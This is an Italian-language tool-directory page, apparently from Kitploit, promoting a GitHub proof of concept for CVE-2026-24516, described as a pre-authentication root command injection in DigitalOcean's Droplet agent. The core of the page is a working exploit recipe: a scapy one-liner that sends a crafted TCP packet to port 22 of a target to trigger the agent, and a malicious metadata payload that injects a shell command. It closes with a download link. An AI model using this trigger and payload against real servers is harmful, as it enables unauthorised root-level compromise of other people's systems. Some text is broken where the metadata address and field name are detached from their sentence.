Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24516-DigitalOcean-RCE — Critica RCE Root Pre-Autenticazione (CVSS 10.0) nell'Agente Droplet di DigitalOcean fino alla v1.3.2 tramite Iniezione di Comandi. | Kitploit
Strumenti/GitHubGitHub/poxsky/cve-2026-24516-digitalocean-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubpoxsky/cve-2026-24516-digitalocean-rce

CVE-2026-24516-DigitalOcean-RCE

Critica RCE Root Pre-Autenticazione (CVSS 10.0) nell'Agente Droplet di DigitalOcean fino alla v1.3.2 tramite Iniezione di Comandi.

Vedi Repository
14 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24516-DigitalOcean-RCE

RCE critica pre-autenticazione come root (CVSS 10.0) nell'agente Droplet di DigitalOcean fino alla v1.3.2 tramite command injection.

CVE-2026-24516: RCE pre-autenticazione come root nell'agente Droplet di DigitalOcean

Panoramica

È stata scoperta una vulnerabilità critica di command injection nell'agente Droplet di DigitalOcean (tutte le versioni fino alla 1.3.2 inclusa). Questa falla consente a un attaccante di ottenere Remote Code Execution (RCE) con privilegi di root senza alcuna autenticazione.

Scopritore: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research

Dettagli tecnici

La vulnerabilità risiede nel componente actioner per la risoluzione dei problemi:

  • internal/troubleshooting/actioner/actioner.go
  • internal/troubleshooting/command/exec.go

L'agente elabora i metadati dal servizio locale () ed esegue i comandi dall'array senza una corretta sanificazione.

169.254.169.254
TroubleshootingAgent.Requesting

Il trigger (Port Knocking)

L'agente viene attivato da uno specifico pacchetto TCP sulla porta 22:

  • SeqNum: 68796879
  • AckNum: 848489

Proof of Concept (PoC)

  1. Attivare il fetch: python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"

  2. Payload di metadati dannosi:

    root@kitploit:~
    {
      "troubleshooting_agent": {
        "requesting": ["command:id > /tmp/pwned"]
      }
    }
    

Impatto Punteggio CVSS: 10.0 (Critico)

Privilegi richiesti: Nessuno

Risultato: Compromissione completa del sistema (accesso root)

photo_1_2026-03-22_13-46-01 photo_12_2026-03-22_13-46-01 photo_3_2026-03-22_13-46-01 photo_4_2026-03-22_13-46-01 photo_5_2026-03-22_13-46-01 photo_6_2026-03-22_13-46-01

Scarica lo strumento